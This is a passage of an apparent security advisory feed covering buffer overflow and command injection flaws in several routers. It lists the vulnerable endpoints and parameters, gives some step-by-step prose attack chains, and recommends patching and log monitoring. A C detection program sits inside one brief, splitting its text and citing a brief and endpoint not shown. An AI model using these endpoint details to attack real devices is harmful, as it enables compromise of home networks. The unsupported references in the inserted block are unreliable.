This vulnerability poses a significant threat to affected Tenda CH22 devices, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda CH22 device running firmware version 1.0.0.1/1.If.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/setcfm\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes the \u003ccode\u003efuncname\u003c/code\u003e argument containing a string exceeding the buffer size allocated to it.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSetCfm\u003c/code\u003e function processes the malicious \u003ccode\u003efuncname\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003efuncname\u003c/code\u003e value overflows the stack buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker overwrites the return address on the stack with an address pointing to malicious code or a ROP chain.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSetCfm\u003c/code\u003e function returns, causing execution to jump to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the device, potentially leading to full system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote, unauthenticated attacker to execute arbitrary code on the affected Tenda CH22 device. This can result in complete device compromise, allowing the attacker to control the device, steal sensitive information, or use the device as a foothold for further attacks on the network. 
Given the availability of public exploits, a large number of devices could be compromised if left unpatched.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/setcfm\u003c/code\u003e with unusually long \u003ccode\u003efuncname\u003c/code\u003e parameters, using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eRate limiting on requests to \u003ccode\u003e/goform/setcfm\u003c/code\u003e only slows an attacker who needs repeated attempts; a single crafted request can trigger the overflow, so pair it with restricting access to the web interface to trusted hosts.\u003c/li\u003e\n\u003cli\u003eApply any available patches or firmware updates from Tenda to address CVE-2026-5154.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T23:17:04Z","date_published":"2026-03-30T23:17:04Z","id":"/briefs/2026-03-tenda-ch22-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda CH22 1.0.0.1/1.If allowing remote attackers to execute arbitrary code by manipulating the `funcname` argument in the `/goform/setcfm` endpoint.","title":"Tenda CH22 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ch22-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["CVE-2026-5046","tenda","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5046 is a stack-based buffer overflow vulnerability affecting Tenda FH1201 routers running firmware version 1.2.0.14(408). The vulnerability resides within the \u003ccode\u003eformWrlExtraSet\u003c/code\u003e function of the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e component, specifically in the handling of the \u003ccode\u003eGO\u003c/code\u003e argument. 
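\u003c/p\u003e\n\u003cp\u003eThe recommendations in the briefs above all reduce to one check: a POST to the vulnerable \u003ccode\u003e/goform/\u003c/code\u003e path whose named parameter is longer than the handler\u0026rsquo;s buffer. The C program below is an added example of that check, not vendor code or a CraftedSignal rule. It runs over the raw text of a captured HTTP request, as a proxy, IDS or packet capture in front of the router would supply it (the router\u0026rsquo;s own \u003ccode\u003ehttpd\u003c/code\u003e does not log POST bodies), confirms the method and path, and measures the percent-decoded length of the parameter. The endpoint and parameter names are taken from the CVE-2026-5604 brief; the threshold, the request bodies and the helper names are assumptions.\u003c/p\u003e\n

```c
/*
 * Added example, not vendor code: the long-parameter check behind the
 * detection recommendations in these briefs, applied to a captured HTTP
 * request. Threshold, sample bodies and helper names are assumptions.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Bytes a URL-encoded value occupies after decoding: each valid %XX triple
 * becomes one byte, everything else (including '+') is one byte. */
static int decoded_len(const char *s, size_t n)
{
    int len = 0;
    size_t i = 0;
    while (i < n) {
        if (s[i] == '%' && i + 2 < n &&
            isxdigit((unsigned char)s[i + 1]) && isxdigit((unsigned char)s[i + 2]))
            i += 3;
        else
            i += 1;
        len++;
    }
    return len;
}

/* Decoded length of parameter `name` in a form body, or -1 if absent. */
int param_value_len(const char *body, const char *name)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (*p) {
        const char *end = strchr(p, '&');
        size_t flen = end ? (size_t)(end - p) : strlen(p);
        if (flen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=')
            return decoded_len(p + nlen + 1, flen - nlen - 1);
        if (!end)
            break;
        p = end + 1;
    }
    return -1;
}

/* Decoded length of `param` in the body of a POST to exactly `path`
 * (a query string is tolerated); -1 for any other request or if absent. */
int post_param_len(const char *req, const char *path, const char *param)
{
    if (strncmp(req, "POST ", 5) != 0)
        return -1;
    const char *uri = req + 5;
    size_t plen = strlen(path);
    if (strncmp(uri, path, plen) != 0 || (uri[plen] != ' ' && uri[plen] != '?'))
        return -1;
    const char *body = strstr(req, "\r\n\r\n");   /* end of headers */
    if (!body)
        return -1;
    return param_value_len(body + 4, param);
}

/* The detection: 1 when `param` in a POST to `path` is at least
 * `threshold` decoded bytes, else 0. */
int flag_long_param(const char *req, const char *path, const char *param, int threshold)
{
    return post_param_len(req, path, param) >= threshold;
}

/* Builds a minimal HTTP/1.1 POST request text (constructed test input). */
int make_post(char *buf, size_t size, const char *path, const char *body)
{
    return snprintf(buf, size,
                    "POST %s HTTP/1.1\r\nHost: 192.168.0.1\r\n"
                    "Content-Type: application/x-www-form-urlencoded\r\n"
                    "Content-Length: %zu\r\n\r\n%s",
                    path, strlen(body), body);
}

int main(void)
{
    const char *path = "/goform/CertLocalPrecreate";   /* from the CVE-2026-5604 brief */
    const int threshold = 128;                        /* assumed; real buffer size unknown */
    char body[2048], req[2560];

    make_post(req, sizeof req, path, "standard=x509&name=test");   /* benign */
    printf("benign  : len=%d flag=%d\n", post_param_len(req, path, "standard"),
           flag_long_param(req, path, "standard", threshold));

    strcpy(body, "standard=");                       /* 400 raw bytes */
    memset(body + 9, 'A', 400);
    strcpy(body + 409, "&name=test");
    make_post(req, sizeof req, path, body);
    printf("raw 400 : len=%d flag=%d\n", post_param_len(req, path, "standard"),
           flag_long_param(req, path, "standard", threshold));

    strcpy(body, "standard=");                       /* same value, 1200 bytes on the wire */
    for (int i = 0; i < 400; i++)
        strcat(body, "%41");
    make_post(req, sizeof req, path, body);
    printf("encoded : len=%d flag=%d\n", post_param_len(req, path, "standard"),
           flag_long_param(req, path, "standard", threshold));
    return 0;
}
```

\u003cp\u003eThe raw and percent-encoded requests both decode to 400 bytes and are both flagged, which is why the check measures decoded rather than on-the-wire length: that keeps the threshold comparable to the buffer the handler actually writes into. A Sigma rule over a proxy or IDS log field should apply the same decoding, and the threshold should be set from the size of the buffer in the affected firmware once that is known.\u003c/p\u003e\n\u003cp\u003e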
A remote attacker can exploit this flaw by sending a crafted HTTP request with a maliciously oversized \u003ccode\u003eGO\u003c/code\u003e parameter, overwriting the stack and potentially gaining arbitrary code execution on the device. The…\u003c/p\u003e\n","date_modified":"2026-03-29T15:16:36Z","date_published":"2026-03-29T15:16:36Z","id":"/briefs/2026-03-tenda-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5046) in Tenda FH1201 version 1.2.0.14(408) allows remote attackers to execute arbitrary code by manipulating the GO argument in the formWrlExtraSet function of the /goform/WrlExtraSet component.","title":"Tenda FH1201 Stack-Based Buffer Overflow Vulnerability (CVE-2026-5046)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5044","buffer-overflow","belkin","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical security vulnerability, CVE-2026-5044, has been identified in Belkin F9K1122 router version 1.00.33. The vulnerability resides within the \u003ccode\u003eformSetSystemSettings\u003c/code\u003e function of the \u003ccode\u003e/goform/formSetSystemSettings\u003c/code\u003e file, which is part of the Setting Handler component. Successful exploitation allows a remote attacker to trigger a stack-based buffer overflow by manipulating the \u003ccode\u003ewebpage\u003c/code\u003e argument. This could result in arbitrary code execution on the device. 
Publicly available exploit code…\u003c/p\u003e\n","date_modified":"2026-03-29T13:17:03Z","date_published":"2026-03-29T13:17:03Z","id":"/briefs/2026-03-belkin-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5044) in Belkin F9K1122 version 1.00.33 allows remote attackers to execute arbitrary code by manipulating the 'webpage' argument in the formSetSystemSettings function, potentially leading to complete system compromise.","title":"Belkin F9K1122 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-belkin-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5042","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-5042, has been discovered in Belkin F9K1122 routers running firmware version 1.00.33. The vulnerability resides within the \u003ccode\u003eformCrossBandSwitch\u003c/code\u003e function of the \u003ccode\u003e/goform/formCrossBandSwitch\u003c/code\u003e file, a component of the Parameter Handler. Successful exploitation could allow a remote, unauthenticated attacker to execute arbitrary code on the device. 
Publicly available exploit code increases the risk of widespread…\u003c/p\u003e\n","date_modified":"2026-03-29T11:16:34Z","date_published":"2026-03-29T11:16:34Z","id":"/briefs/2026-03-belkin-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5042) exists in the Belkin F9K1122 router version 1.00.33, allowing remote attackers to execute arbitrary code by manipulating the webpage argument in the formCrossBandSwitch function.","title":"Belkin F9K1122 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-belkin-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5036","buffer-overflow","router","tenda"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, identified as CVE-2026-5036, affects the Tenda 4G06 router, specifically version 04.06.01.29. The vulnerability resides in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function within the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint. A remote attacker can exploit this by crafting a malicious request that manipulates the \u003ccode\u003epage\u003c/code\u003e argument, leading to a buffer overflow on the stack. This could allow the attacker to potentially execute arbitrary code on the device. 
Given the…\u003c/p\u003e\n","date_modified":"2026-03-29T08:15:56Z","date_published":"2026-03-29T08:15:56Z","id":"/briefs/2026-03-tenda-4g06-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5036) exists in the fromDhcpListClient function of the Tenda 4G06 router (version 04.06.01.29), potentially allowing remote attackers to execute arbitrary code by manipulating the 'page' argument in the /goform/DhcpListClient endpoint.","title":"Tenda 4G06 Router Stack-Based Buffer Overflow Vulnerability (CVE-2026-5036)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-4g06-bo/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5021","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, identified as CVE-2026-5021, has been discovered in Tenda F453 router version 1.0.0.3. This vulnerability resides within the \u003ccode\u003efromPPTPUserSetting\u003c/code\u003e function of the \u003ccode\u003e/goform/PPTPUserSetting\u003c/code\u003e component, specifically in the \u003ccode\u003ehttpd\u003c/code\u003e process. The vulnerability can be triggered by manipulating the \u003ccode\u003edelno\u003c/code\u003e argument. Successful exploitation allows remote attackers to potentially execute arbitrary code on the affected device. 
Publicly available exploit code…\u003c/p\u003e\n","date_modified":"2026-03-29T02:16:17Z","date_published":"2026-03-29T02:16:17Z","id":"/briefs/2026-03-tenda-f453-overflow/","summary":"A stack-based buffer overflow vulnerability in Tenda F453 1.0.0.3 allows a remote attacker to execute arbitrary code by manipulating the 'delno' argument in the fromPPTPUserSetting function of the /goform/PPTPUserSetting component's httpd process.","title":"Tenda F453 Stack-Based Buffer Overflow Vulnerability (CVE-2026-5021)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-f453-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical vulnerability, identified as CVE-2026-5004, affects the Wavlink WL-WN579X3-C 231124 router. The vulnerability lies within the UPNP Handler component, specifically the \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e file\u0026rsquo;s \u003ccode\u003esub_4019FC\u003c/code\u003e function. By manipulating the \u003ccode\u003eUpnpEnabled\u003c/code\u003e argument, a remote attacker can trigger a stack-based buffer overflow. This can lead to arbitrary code execution on the device. Public exploits for this vulnerability are available, increasing the risk of widespread exploitation. Despite responsible disclosure attempts, the vendor has not provided a patch or response, leaving users vulnerable. 
This is a significant concern for network security, especially for devices exposed to the internet.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Wavlink WL-WN579X3-C 231124 router exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes a manipulated \u003ccode\u003eUpnpEnabled\u003c/code\u003e argument designed to overflow the buffer in the \u003ccode\u003esub_4019FC\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003esub_4019FC\u003c/code\u003e function processes the \u003ccode\u003eUpnpEnabled\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow occurs, overwriting adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe overwritten return address points to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eUpon function return, execution jumps to the attacker-controlled code, allowing arbitrary commands to be executed.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution, potentially allowing complete control of the device, including network access and data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5004 allows a remote attacker to execute arbitrary code on the vulnerable Wavlink WL-WN579X3-C 231124 router. This could lead to complete device compromise, including unauthorized network access, data exfiltration, and the potential use of the router as a botnet node. Given the availability of public exploits, a widespread exploitation is possible, affecting potentially thousands of devices. 
The lack of vendor response exacerbates the risk, as no official patch is available.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Firewall CGI Requests\u003c/code\u003e to your SIEM and tune for your environment to identify potential exploitation attempts targeting the \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect UPNP Enabled Overflow\u003c/code\u003e to detect possible overflows.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/firewall.cgi\u003c/code\u003e with unusually long \u003ccode\u003eUpnpEnabled\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eIf possible, isolate Wavlink WL-WN579X3-C 231124 routers from direct internet exposure until a patch is available.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-29T00:00:00Z","date_published":"2026-03-29T00:00:00Z","id":"/briefs/2026-03-wavlink-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Wavlink WL-WN579X3-C 231124's UPNP Handler component, specifically in the /cgi-bin/firewall.cgi file and the sub_4019FC function, allowing remote attackers to execute arbitrary code by manipulating the UpnpEnabled argument; public exploits are available, but the vendor has not responded to the disclosure.","title":"Wavlink WL-WN579X3-C Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-wavlink-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer overflow","cve-2026-4975"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-4975 is a critical security vulnerability affecting Tenda AC15 routers running firmware version 15.03.05.19. 
This vulnerability resides in the \u003ccode\u003eformSetCfm\u003c/code\u003e function, specifically within the \u003ccode\u003e/goform/setcfm\u003c/code\u003e file, which handles POST requests. An attacker can exploit a stack-based buffer overflow by sending a crafted POST request with a malicious payload in the \u003ccode\u003efuncpara1\u003c/code\u003e argument. The vulnerability is remotely exploitable, meaning an attacker does not need local access to the device…\u003c/p\u003e\n","date_modified":"2026-03-28T12:00:00Z","date_published":"2026-03-28T12:00:00Z","id":"/briefs/2026-03-tenda-ac15-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-4975) exists in the Tenda AC15 router version 15.03.05.19, allowing remote attackers to execute arbitrary code by manipulating the 'funcpara1' argument in a POST request to /goform/setcfm.","title":"Tenda AC15 Stack-Based Buffer Overflow Vulnerability (CVE-2026-4975)","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac15-bo/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4976","buffer-overflow","totolink","router","remote-code-execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, CVE-2026-4976, has been identified in Totolink LR350 routers running firmware version 9.3.5u.6369_B20220309. The vulnerability resides in the \u003ccode\u003esetWiFiGuestCfg\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By crafting a malicious HTTP request and manipulating the \u003ccode\u003essid\u003c/code\u003e argument, a remote, unauthenticated attacker can trigger a buffer overflow, potentially leading to arbitrary code execution on the device. 
The availability of a public exploit…\u003c/p\u003e\n","date_modified":"2026-03-27T21:17:28Z","date_published":"2026-03-27T21:17:28Z","id":"/briefs/2026-03-totolink-buffer-overflow/","summary":"A buffer overflow vulnerability in Totolink LR350 version 9.3.5u.6369_B20220309 allows a remote attacker to execute arbitrary code by manipulating the 'ssid' argument in the setWiFiGuestCfg function.","title":"Totolink LR350 Remote Buffer Overflow Vulnerability (CVE-2026-4976)","url":"https://feed.craftedsignal.io/briefs/2026-03-totolink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda AC7 router firmware, specifically version 15.03.06.44. The vulnerability resides in the \u003ccode\u003efromSetSysTime\u003c/code\u003e function within the \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e component, which handles POST requests. A remote attacker can exploit this flaw by crafting a malicious POST request with an overly long \u003ccode\u003eTime\u003c/code\u003e argument, causing a buffer overflow on the stack. Publicly available exploits exist, increasing the risk of exploitation. Successful exploitation could lead to arbitrary code execution on the device, potentially granting the attacker complete control over the router. 
This is a critical vulnerability due to the ease of remote exploitation and the potential for significant impact.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda AC7 router running firmware version 15.03.06.44.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a POST request targeting the \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes the \u003ccode\u003eTime\u003c/code\u003e argument, set to a string exceeding the expected buffer size.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSetSysTime\u003c/code\u003e function processes the \u003ccode\u003eTime\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe overly long \u003ccode\u003eTime\u003c/code\u003e argument overflows the stack buffer during the copy operation.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker controls the overwritten return address, redirecting execution flow to malicious code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially leading to complete device compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda AC7 router. This can lead to a variety of malicious outcomes, including complete device compromise, modification of router settings (DNS, firewall rules), interception of network traffic, and use of the router as a botnet node. 
Given the widespread use of Tenda routers, a large number of devices could be vulnerable, potentially impacting home users and small businesses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Tenda to address CVE-2026-4974.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for POST requests to \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e with abnormally long \u003ccode\u003eTime\u003c/code\u003e parameters, using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/goform/SetSysTimeCfg\u003c/code\u003e endpoint to mitigate brute-force attempts to exploit the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect processes spawned by the webserver after the exploit is triggered.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-27T20:16:38Z","date_published":"2026-03-27T20:16:38Z","id":"/briefs/2026-03-tenda-ac7-overflow/","summary":"A stack-based buffer overflow vulnerability exists in Tenda AC7 version 15.03.06.44 within the fromSetSysTime function of the /goform/SetSysTimeCfg component's POST Request Handler, allowing a remote attacker to potentially execute arbitrary code by manipulating the 'Time' argument.","title":"Tenda AC7 Stack-Based Buffer Overflow in SetSysTimeCfg","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac7-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-4960","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability has been identified in Tenda AC6 router firmware version 15.03.05.16. 
The vulnerability, tracked as CVE-2026-4960, resides within the \u003ccode\u003efromWizardHandle\u003c/code\u003e function of the \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e component, which handles POST requests. A remote attacker can exploit this vulnerability by sending a crafted POST request with a manipulated \u003ccode\u003eWANT\u003c/code\u003e or \u003ccode\u003eWANS\u003c/code\u003e argument, leading to arbitrary code execution on the device. Public exploit code is available, increasing the risk of widespread exploitation. This vulnerability poses a significant threat, potentially allowing attackers to gain complete control over vulnerable routers and compromise connected networks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda AC6 router running firmware version 15.03.05.16.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker manipulates the \u003ccode\u003eWANT\u003c/code\u003e or \u003ccode\u003eWANS\u003c/code\u003e argument to inject a payload exceeding the buffer size.\u003c/li\u003e\n\u003cli\u003eThe router processes the POST request, passing the attacker-controlled input to the vulnerable \u003ccode\u003efromWizardHandle\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe overflow occurs when the \u003ccode\u003efromWizardHandle\u003c/code\u003e function copies the attacker-supplied data into a fixed-size buffer on the stack without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe injected payload overwrites adjacent memory locations on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromWizardHandle\u003c/code\u003e function returns, it jumps to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe 
attacker gains arbitrary code execution on the router, potentially leading to complete system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to gain complete control of the affected Tenda AC6 router. This can lead to a variety of malicious outcomes, including network hijacking, DNS poisoning, interception of network traffic, deployment of malware, and the creation of botnets. Given the widespread use of Tenda routers in home and small business networks, a large number of devices are potentially vulnerable. The CVSS v3.1 score of 8.8 reflects the high severity of this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-4960.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e with abnormally long \u003ccode\u003eWANT\u003c/code\u003e or \u003ccode\u003eWANS\u003c/code\u003e parameters using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (NIDS) rules to detect exploit attempts targeting the \u003ccode\u003e/goform/WizardHandle\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s web interface from the public internet where possible to reduce the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-27T17:16:30Z","date_published":"2026-03-27T17:16:30Z","id":"/briefs/2026-03-tenda-ac6-overflow/","summary":"A stack-based buffer overflow vulnerability in Tenda AC6 version 15.03.05.16 allows remote attackers to execute arbitrary code by manipulating the WANT/WANS argument in the /goform/WizardHandle POST request handler.","title":"Tenda AC6 Stack-Based Buffer Overflow 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac6-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","tenda","router","cve-2026-4905"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, identified as CVE-2026-4905, has been discovered in Tenda AC5 home routers running firmware version 15.03.06.47. The vulnerability resides within the \u003ccode\u003eformWifiWpsOOB\u003c/code\u003e function in the \u003ccode\u003e/goform/WifiWpsOOB\u003c/code\u003e file, which handles POST requests. Attackers can remotely exploit this flaw by crafting a malicious POST request to this endpoint, specifically targeting the \u003ccode\u003eindex\u003c/code\u003e argument. Successful exploitation leads to arbitrary code execution on the device…\u003c/p\u003e\n","date_modified":"2026-03-27T00:16:24Z","date_published":"2026-03-27T00:16:24Z","id":"/briefs/2026-03-tenda-ac5-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-4905) exists in Tenda AC5 firmware version 15.03.06.47 allowing remote attackers to execute arbitrary code by manipulating the 'index' argument in a POST request to the /goform/WifiWpsOOB endpoint.","title":"Tenda AC5 Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-tenda-ac5-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","vulnerability","netcore","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA remote command execution vulnerability, CVE-2026-4840, affects Netcore Power 15AX devices with firmware versions up to 3.0.0.6938. 
The vulnerability resides in the Diagnostic Tool Interface, specifically within the \u003ccode\u003esetTools\u003c/code\u003e function of the \u003ccode\u003e/bin/netis.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003eIpAddr\u003c/code\u003e argument, an attacker can inject and execute arbitrary operating system commands on the device. This vulnerability poses a significant risk, as it allows unauthenticated remote attackers to gain complete…\u003c/p\u003e\n","date_modified":"2026-03-26T05:16:40Z","date_published":"2026-03-26T05:16:40Z","id":"/briefs/2026-03-netcore-rce/","summary":"CVE-2026-4840 is a critical command injection vulnerability in the Netcore Power 15AX router that allows remote attackers to execute arbitrary OS commands by manipulating the IpAddr argument in the setTools function of the /bin/netis.cgi file.","title":"Netcore Power 15AX Remote Command Execution Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-netcore-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","router","legacy-device"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-4627 is an OS command injection vulnerability affecting D-Link DIR-825 and DIR-825R routers, specifically versions 1.0.5 and 4.5.1. The vulnerability resides within the \u003ccode\u003ehandler_update_system_time\u003c/code\u003e function of the \u003ccode\u003elibdeuteron_modules.so\u003c/code\u003e file, which is part of the NTP 